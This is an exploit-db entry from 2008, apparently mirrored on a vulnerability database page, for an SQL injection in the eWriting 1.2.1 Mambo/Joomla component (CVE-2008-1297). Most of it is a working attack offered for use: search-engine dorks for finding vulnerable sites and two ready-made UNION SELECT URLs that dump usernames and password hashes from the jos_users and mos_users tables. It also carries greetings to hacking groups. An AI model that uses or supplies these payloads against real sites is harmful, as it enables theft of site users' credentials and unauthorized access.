Lucene search
DonEDB-ID:5226HistoryMar 10, 2008 - 12:00 a.m.
Mambo Component eWriting 1.2.1 - 'cat' SQL Injection
2008-03-1000:00:00
Don
www.exploit-db.com
28
eWriting 1.2.1 - SQL injection
# Discovered by breaker_unit & Don
# BHack
# b4lc4n.org
# Gretz to h4cky0u.org l r00tsecurity.org l h4cky0u.biz l
Dorks:
"Powered by eWriting 1.2.1
allinurl:"com_ewriting"
Joomla!
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--
Mambo
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+mos_users--
++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# milw0rm.com [2008-03-10]Related
cvelist
cvelist
CVE-2008-1297
2008-03-12 17:00:00
cve
cve
CVE-2008-1297
2008-03-12 17:44:00
nvd
nvd
CVE-2008-1297
2008-03-12 17:44:00
prion
prion
Sql injection
2008-03-12 17:44:00